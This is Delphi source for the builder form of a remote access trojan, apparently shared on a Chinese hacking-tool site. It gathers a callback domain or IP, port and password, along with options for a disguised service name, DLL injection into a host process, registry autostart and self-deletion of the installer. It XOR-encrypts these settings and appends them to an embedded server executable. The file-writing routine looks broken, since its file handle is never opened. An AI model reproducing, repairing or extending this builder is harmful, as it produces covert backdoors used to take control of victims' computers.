- {南域剑盟 www.98exe.com 上兴QQ:51992
- 声明:程序由南域剑盟98exe.com成员网上搜集,不承担技术及版权问题}
- unit untServerCreator;
- interface
- uses
- Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
- Dialogs, StdCtrls, ExtCtrls, ComCtrls, jpeg;
- type
- TForm7 = class(TForm)
- CheckBox1: TCheckBox;
- Bevel2: TBevel;
- Label3: TLabel;
- portEdit: TEdit;
- Button1: TButton;
- Label4: TLabel;
- dnsEdit: TEdit;
- Label5: TLabel;
- passEdit: TEdit;
- Button2: TButton;
- ProgressBar1: TProgressBar;
- Label6: TLabel;
- Edit6: TEdit;
- Label8: TLabel;
- ComboBox1: TComboBox;
- Label9: TLabel;
- ComboBox2: TComboBox;
- spSkinStdLabel1: TLabel;
- ComboBoxDll: TComboBox;
- spSkinStdLabel2: TLabel;
- ComboBoxHost: TComboBox;
- CheckBox2: TCheckBox;
- CheckBox8: TCheckBox;
- RadioBox1: TCheckBox;
- Label14: TLabel;
- ServerView: TEdit;
- Label15: TLabel;
- ServerName: TEdit;
- Label16: TLabel;
- ServerText: TEdit;
- CheckBox9: TCheckBox;
- CheckBox10: TCheckBox;
- CheckBox11: TCheckBox;
- RadioGroup1: TRadioGroup;
- GrEdit3: TEdit;
- Label7: TLabel;
- dlgSave1: TSaveDialog;
- procedure Button1Click(Sender: TObject);
- procedure Button2Click(Sender: TObject);
- function GatherInfo: String;
- private
- { Private declarations }
- public
- { Public declarations }
- end;
- var
- Form7: TForm7;
- implementation
- {$R *.dfm}
- procedure TForm7.Button1Click(Sender: TObject);
- begin
- Randomize;
- portEdit.Text := IntToStr(Random(10000)+100);
- end;
- Function EncryptText(Text: String): String;
- Var
- I :Word;
- C :Word;
- Begin
- Result := '';
- For I := 1 To Length(Text) Do
- Begin
- C := Ord(Text[I]);
- Result := Result + Chr((C Xor 12));
- End;
- End;
- function GetLength(Text: String): String;
- Begin
- If (Length(Text) > 9) Then
- Result := IntToStr(Length(Text))
- Else
- Result := '0'+IntToStr(Length(Text));
- End;
- function TForm7.GatherInfo: String;
- const
- Qhead = '01';
- begin
- Result :=
- GetLength('')+''+ //URL转向域名
- Qhead + inttostr(RadioGroup1.ItemIndex)+ //连接类型
- GetLength(DnsEdit.Text)+DnsEdit.Text+ //自己连接域名或IP地址
- GetLength(portEdit.Text)+portEdit.Text+ //被动连接端口
- GetLength(portEdit.Text)+portEdit.Text+ //主动连接端口号
- GetLength(passEdit.Text)+passEdit.Text+ //连接密码
- GetLength(GrEdit3.Text)+GrEdit3.Text+ //上线分组
- '02' + IntToStr(Integer(CheckBox8.Checked))+IntToStr(Integer(RadioBox1.Checked))+//Win9x下写入注册表启动项 01:以服务运行,10:注册自动启动 11:有自动启动也有以服务运行
- Qhead + inttostr(ComboBox1.ItemIndex) + //安装路径
- GetLength(ComboBox2.Text)+ComboBox2.Text+ //安装名称
- Qhead + IntToStr(Integer(CheckBox2.Checked))+ //自动删除安装文件
- GetLength(ServerView.Text)+ServerView.Text+ //显示名称
- GetLength(ServerName.Text)+ServerName.Text+ //服务名称
- GetLength(ServerText.Text)+ServerText.Text+ //描述信息
- GetLength(ComboBoxHost.Text)+ComboBoxHost.Text+ //注入的进程名称
- GetLength(ComboBoxDll.Text)+ComboBoxDll.Text+ //Dll名称
- Qhead + IntToStr(Integer(CheckBox9.Checked))+ //注册在HKEY_LOCAL_MACHINE
- Qhead + IntToStr(Integer(CheckBox11.Checked))+ //注册在HKEY_CURRENT_USER
- Qhead + IntToStr(Integer(CheckBox10.Checked)); //注册为Shell Explorer
- Result := #00 + EncryptText(Result);
- end;
- Procedure ReadFileStr(dName: String; Var Content: String);
- Var
- FContents : File Of Char;
- FBuffer : Array [1..1024] Of Char;
- rLen : LongInt;
- FSize : LongInt;
- Begin
- Try
- Content := '';
- AssignFile(FContents, dName);
- Reset(FContents);
- FSize := FileSize(FContents);
- While Not EOF(FContents) Do
- Begin
- BlockRead(FContents, FBuffer, 1024, rLen);
- Content := Content + String(FBuffer);
- End;
- CloseFile(FContents);
- If Length(Content) > FSize Then
- Content := Copy(Content, 1, FSize);
- Except
- Exit;
- End;
- End;
- Function ExtractServer(dName: String): String;
- Var
- ResultFilePath :String;
- ResourceLocation :HRSRC;
- ResourcePointer :PChar;
- ResourceSize :LongWord;
- BytesWritten :LongWord;
- ResDataHandle :THandle;
- FileHandle :THandle;
- Begin
- if Form7.dlgSave1.Execute then
- ResultFilePath := Form7.dlgSave1.FileName;//ExtractFilePath(ParamStr(0)) + 'Server.exe';
- If (FileExists(ResultFilePath)) Then
- DeleteFile(pChar(ResultFilePath));
- ResourceLocation := FindResource(hInstance, pChar(dName), RT_RCDATA);
- If ResourceLocation = 0 Then Exit;
- ResourceSize := SizeOfResource(HInstance, ResourceLocation);
- If ResourceSize = 0 Then Exit;
- ResDataHandle := LoadResource(HInstance, ResourceLocation);
- If ResDataHandle = 0 Then Exit;
- ResourcePointer := LockResource(ResDataHandle);
- If ResourcePointer = NIL Then Exit;
- If FileHandle = INVALID_HANDLE_VALUE Then Exit;
- WriteFile(FileHandle, ResourcePointer^, ResourceSize, BytesWritten, NIL);
- CloseHandle(FileHandle);
- Result := ResultFilePath;
- End;
- procedure TForm7.Button2Click(Sender: TObject);
- Var
- Settings :String;
- Content :String;
- Name :String;
- F :TextFile;
- begin
- ProgressBar1.Position := 0;
- Settings := GatherInfo;
- ProgressBar1.Position := 20;
- Name := ExtractServer('DSN');
- Sleep(200);
- ReadFileStr(Name, Content);
- ProgressBar1.Position := 50;
- AssignFile(F, Name);
- Append(F);
- ProgressBar1.Position := 75;
- Write(F, Settings);
- ProgressBar1.Position := 90;
- CloseFile(F);
- ProgressBar1.Position := 0;
- MessageBox(0, 'Server created successfully.', 'Notice', mb_ok);
- end;
- end.